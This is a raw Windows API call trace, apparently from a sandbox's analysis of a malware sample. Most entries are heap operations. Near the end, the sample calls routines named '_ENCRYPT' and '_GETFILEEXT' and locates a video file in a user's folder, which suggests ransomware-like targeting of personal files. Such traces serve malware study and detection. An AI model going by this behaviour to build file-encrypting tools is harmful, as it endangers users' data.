0x9bda98 [0192.776] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd648 [0192.776] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd540 [0192.776] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1d30 [0192.776] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd540 | out: hHeap=0x8a0000) returned 1 [0192.776] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1d30 | out: hHeap=0x8a0000) returned 1 [0192.776] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd648 | out: hHeap=0x8a0000) returned 1 [0192.776] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd648 [0192.776] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd540 [0192.776] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdab0 [0192.776] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1d30 [0192.776] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdab0 | out: hHeap=0x8a0000) returned 1 [0192.776] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1d30 | out: hHeap=0x8a0000) returned 1 [0192.776] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd540 | out: hHeap=0x8a0000) returned 1 [0192.776] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd540 [0192.776] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdab0 [0192.776] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd948 [0192.776] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1d30 [0192.776] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd948 | out: hHeap=0x8a0000) returned 1 [0192.776] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1d30 | out: hHeap=0x8a0000) returned 1 [0192.776] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdab0 | out: hHeap=0x8a0000) returned 1 [0192.776] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdab0 [0192.776] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd948 [0192.776] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba078 [0192.777] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1d30 [0192.777] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba078 | out: hHeap=0x8a0000) returned 1 [0192.777] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1d30 | out: hHeap=0x8a0000) returned 1 [0192.777] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd948 | out: hHeap=0x8a0000) returned 1 [0192.777] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd948 [0192.777] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba078 [0192.777] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba288 [0192.777] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1d30 [0192.777] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba288 | out: hHeap=0x8a0000) returned 1 [0192.777] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1d30 | out: hHeap=0x8a0000) returned 1 [0192.777] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba078 | out: hHeap=0x8a0000) returned 1 [0192.777] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba078 [0192.777] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba288 [0192.777] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba120 [0192.777] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1d30 [0192.777] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba120 | out: hHeap=0x8a0000) returned 1 [0192.777] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1d30 | out: hHeap=0x8a0000) returned 1 [0192.777] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba288 | out: hHeap=0x8a0000) returned 1 [0192.777] FreeLibrary (hLibModule=0x75990000) returned 1 [0192.778] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18b0 | out: hHeap=0x8a0000) returned 1 [0192.778] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a20 | out: hHeap=0x8a0000) returned 1 [0192.778] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1ad0 | out: hHeap=0x8a0000) returned 1 [0192.778] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1af0 | out: hHeap=0x8a0000) returned 1 [0192.778] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e19d0 | out: hHeap=0x8a0000) returned 1 [0192.778] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b70 | out: hHeap=0x8a0000) returned 1 [0192.778] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1900 | out: hHeap=0x8a0000) returned 1 [0192.778] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dea38 | out: hHeap=0x8a0000) returned 1 [0192.778] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9fa0 | out: hHeap=0x8a0000) returned 1 [0192.778] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18c0 | out: hHeap=0x8a0000) returned 1 [0192.778] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd588 | out: hHeap=0x8a0000) returned 1 [0192.778] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd330 | out: hHeap=0x8a0000) returned 1 [0192.778] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd768 | out: hHeap=0x8a0000) returned 1 [0192.779] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd960 | out: hHeap=0x8a0000) returned 1 [0192.779] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba4f8 | out: hHeap=0x8a0000) returned 1 [0192.779] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd4c8 | out: hHeap=0x8a0000) returned 1 [0192.779] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd9c0 | out: hHeap=0x8a0000) returned 1 [0192.779] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba390 | out: hHeap=0x8a0000) returned 1 [0192.779] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba540 | out: hHeap=0x8a0000) returned 1 [0192.779] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba0f0 | out: hHeap=0x8a0000) returned 1 [0192.779] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd600 | out: hHeap=0x8a0000) returned 1 [0192.779] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd7c8 | out: hHeap=0x8a0000) returned 1 [0192.779] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd828 | out: hHeap=0x8a0000) returned 1 [0192.779] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda08 | out: hHeap=0x8a0000) returned 1 [0192.779] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd4f8 | out: hHeap=0x8a0000) returned 1 [0192.779] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba1c8 | out: hHeap=0x8a0000) returned 1 [0192.779] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9b68 | out: hHeap=0x8a0000) returned 1 [0192.779] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd3d8 | out: hHeap=0x8a0000) returned 1 [0192.779] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd870 | out: hHeap=0x8a0000) returned 1 [0192.779] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd888 | out: hHeap=0x8a0000) returned 1 [0192.779] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd750 | out: hHeap=0x8a0000) returned 1 [0192.779] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd9d8 | out: hHeap=0x8a0000) returned 1 [0192.779] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd420 | out: hHeap=0x8a0000) returned 1 [0192.779] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdae0 | out: hHeap=0x8a0000) returned 1 [0192.779] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdb10 | out: hHeap=0x8a0000) returned 1 [0192.779] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd528 | out: hHeap=0x8a0000) returned 1 [0192.780] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9e38 | out: hHeap=0x8a0000) returned 1 [0192.780] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd3f0 | out: hHeap=0x8a0000) returned 1 [0192.780] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c0c88 | out: hHeap=0x8a0000) returned 1 [0192.780] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1980 | out: hHeap=0x8a0000) returned 1 [0192.780] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dea38 [0192.780] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd3f0 [0192.780] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1980 [0192.780] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9e38 [0192.780] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e18c0 [0192.780] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b00 | out: hHeap=0x8a0000) returned 1 [0192.780] PeekMessageW (in: lpMsg=0x87f3fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f3fc) returned 0 [0192.780] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b00 [0192.780] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1900 [0192.780] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1900 | out: hHeap=0x8a0000) returned 1 [0192.780] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1900 [0192.780] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b70 [0192.780] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18) returned 0x90d440 [0192.780] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b70 | out: hHeap=0x8a0000) returned 1 [0192.780] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d440 | out: hHeap=0x8a0000) returned 1 [0192.780] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1900 | out: hHeap=0x8a0000) returned 1 [0192.780] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b00 | out: hHeap=0x8a0000) returned 1 [0192.780] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x38) returned 0x90ad98 [0192.780] PeekMessageW (in: lpMsg=0x87f3fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f3fc) returned 0 [0192.780] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de9e8 [0192.781] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd528 [0192.781] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b00 [0192.781] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdb10 [0192.781] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b00 | out: hHeap=0x8a0000) returned 1 [0192.781] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdae0 [0192.781] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b00 [0192.781] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd420 [0192.781] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b00 | out: hHeap=0x8a0000) returned 1 [0192.781] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd9d8 [0192.781] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b00 [0192.781] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd750 [0192.781] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b00 | out: hHeap=0x8a0000) returned 1 [0192.781] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd888 [0192.781] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b00 [0192.781] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd870 [0192.781] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b00 | out: hHeap=0x8a0000) returned 1 [0192.781] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd3d8 [0192.781] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b00 [0192.781] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1900 [0192.781] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1900 | out: hHeap=0x8a0000) returned 1 [0192.781] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b00 | out: hHeap=0x8a0000) returned 1 [0192.781] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b00 [0192.782] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9b68 [0192.782] CharLowerBuffW (in: lpsz="int", cchLength=0x3 | out: lpsz="int") returned 0x3 [0192.782] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba1c8 [0192.782] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1900 [0192.782] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b70 [0192.782] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd4f8 [0192.782] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba1c8 | out: hHeap=0x8a0000) returned 1 [0192.782] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1900 | out: hHeap=0x8a0000) returned 1 [0192.782] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd4f8 | out: hHeap=0x8a0000) returned 1 [0192.782] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b70 | out: hHeap=0x8a0000) returned 1 [0192.782] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de7e0 [0192.782] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b70 [0192.782] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd4f8 [0192.782] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1900 [0192.782] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e19d0 [0192.782] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba1c8 [0192.782] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd4f8 | out: hHeap=0x8a0000) returned 1 [0192.782] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1900 | out: hHeap=0x8a0000) returned 1 [0192.782] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba1c8 | out: hHeap=0x8a0000) returned 1 [0192.782] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e19d0 | out: hHeap=0x8a0000) returned 1 [0192.782] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x75990000 [0192.783] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba1c8 [0192.783] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e19d0 [0192.783] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CloseHandle", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0192.783] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9bd4f8 [0192.783] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CloseHandle", cchWideChar=12, lpMultiByteStr=0x9bd4f8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CloseHandle", lpUsedDefaultChar=0x0) returned 12 [0192.783] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd4f8 | out: hHeap=0x8a0000) returned 1 [0192.783] GetProcAddress (hModule=0x75990000, lpProcName="CloseHandle") returned 0x759a1410 [0192.783] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba1c8 | out: hHeap=0x8a0000) returned 1 [0192.783] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e19d0 | out: hHeap=0x8a0000) returned 1 [0192.783] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de1a0 [0192.783] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e19d0 [0192.783] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e19d0 | out: hHeap=0x8a0000) returned 1 [0192.783] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de1a0 | out: hHeap=0x8a0000) returned 1 [0192.783] CloseHandle (hObject=0x158) returned 1 [0192.783] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e19d0 [0192.783] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x214) returned 0x8e83b8 [0192.783] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1900 [0192.784] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba1c8 [0192.784] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd4f8 [0192.784] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda08 [0192.784] FreeLibrary (hLibModule=0x75990000) returned 1 [0192.784] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b70 | out: hHeap=0x8a0000) returned 1 [0192.784] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de7e0 | out: hHeap=0x8a0000) returned 1 [0192.784] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9b68 | out: hHeap=0x8a0000) returned 1 [0192.784] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b00 | out: hHeap=0x8a0000) returned 1 [0192.784] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdb10 | out: hHeap=0x8a0000) returned 1 [0192.784] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd528 | out: hHeap=0x8a0000) returned 1 [0192.784] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd420 | out: hHeap=0x8a0000) returned 1 [0192.784] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdae0 | out: hHeap=0x8a0000) returned 1 [0192.784] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd750 | out: hHeap=0x8a0000) returned 1 [0192.784] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd9d8 | out: hHeap=0x8a0000) returned 1 [0192.784] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd870 | out: hHeap=0x8a0000) returned 1 [0192.784] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd888 | out: hHeap=0x8a0000) returned 1 [0192.784] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd3d8 | out: hHeap=0x8a0000) returned 1 [0192.784] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de9e8 | out: hHeap=0x8a0000) returned 1 [0192.784] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba1c8 | out: hHeap=0x8a0000) returned 1 [0192.784] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd4f8 | out: hHeap=0x8a0000) returned 1 [0192.785] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1900 | out: hHeap=0x8a0000) returned 1 [0192.785] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e83b8 | out: hHeap=0x8a0000) returned 1 [0192.785] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e19d0 | out: hHeap=0x8a0000) returned 1 [0192.785] PeekMessageW (in: lpMsg=0x87f3fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f3fc) returned 0 [0192.785] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="no", cchCount1=2, lpString2="no", cchCount2=2) returned 2 [0192.785] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd4f8 | out: hHeap=0x8a0000) returned 1 [0192.785] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba2a0 | out: hHeap=0x8a0000) returned 1 [0192.785] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d440 | out: hHeap=0x8a0000) returned 1 [0192.785] PeekMessageW (in: lpMsg=0x87f81c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f81c) returned 0 [0192.785] CharUpperBuffW (in: lpsz="_ENCRYPT", cchLength=0x8 | out: lpsz="_ENCRYPT") returned 0x8 [0192.785] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0192.785] CharUpperBuffW (in: lpsz="_GETFILEEXT", cchLength=0xb | out: lpsz="_GETFILEEXT") returned 0xb [0192.785] PeekMessageW (in: lpMsg=0x87f094, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f094) returned 0 [0192.785] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="v", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0192.785] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="kv", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0192.785] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="mkv", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0192.785] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".mkv", cchCount1=1, lpString2=".", cchCount2=1) returned 2 [0192.785] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0192.785] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0192.786] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0192.786] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\CCOSsWXcEV8ZF\\S8EN.mkv", lpFindFileData=0x87eec0 | out: lpFindFileData=0x87eec0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xde8559c0, ftCreationTime.dwHighDateTime=0x1d5e560, ftLastAccessTime.dwLowDateTime=0x460bbc0, ftLastAccessTime.dwHighDateTime=0x1d5e69d, ftLastWriteTime.dwLowDateTime=0x460bbc0, ftLastWriteTime.dwHighDateTime=0x1d5e69d, nFileSizeHigh=0x0, nFileSizeLow=0x71e4, dwReserved0=0x0, dwReserved1=0x8a7560, cFileName="S8EN.mkv", cAlternateFileName="")) returned 0x90add8 [0192.786] FindClose (in: hFindFile=0x90add8 | out: hFindFile=0x90add8) returned 1 [0192.786] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0192.786] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\CCOSsWXcEV8ZF\\S8EN.mkv", lpFindFileData=0x87eec0 | out: lpFindFileData=0x87eec0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xde8559c0, ftCreationTime.dwHighDateTime=0x1d5e560, ftLastAccessTime.dwLowDateTime=0x460bbc0, ftLastAccessTime.dwHighDateTime=0x1d5e69d, ftLastWriteTime.dwLowDateTime=0x460bbc0, ftLastWriteTime.dwHighDateTime=0x1d5e69d, nFileSizeHigh=0x0, nFileSizeLow=0x71e4, dwReserved0=0x0, dwReserved1=0x8a7560, cFileName="S8EN.mkv", cAlternateFileName="")) returned 0x90add8 [0192.786] FindClose (in: hFindFile=0x90add8 | out: hFindFile=0x90add8) returned 1 [0192.786] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0192.787] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\"C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\CCOSsWXcEV8ZF\\S8EN.mkv\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0192.787] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\CCOSsWXcEV8ZF\\S8EN.mkv\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0192.787] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=":\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\CCOSsWXcEV8ZF\\S8EN.mkv\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0192.787] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\CCOSsWXcEV8ZF\\S8EN.mkv\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0192.787] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Users\\5p5NrGJn0jS HALPmcxz\\Videos\\CCOSsWXcEV8ZF\\S8EN.mkv\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 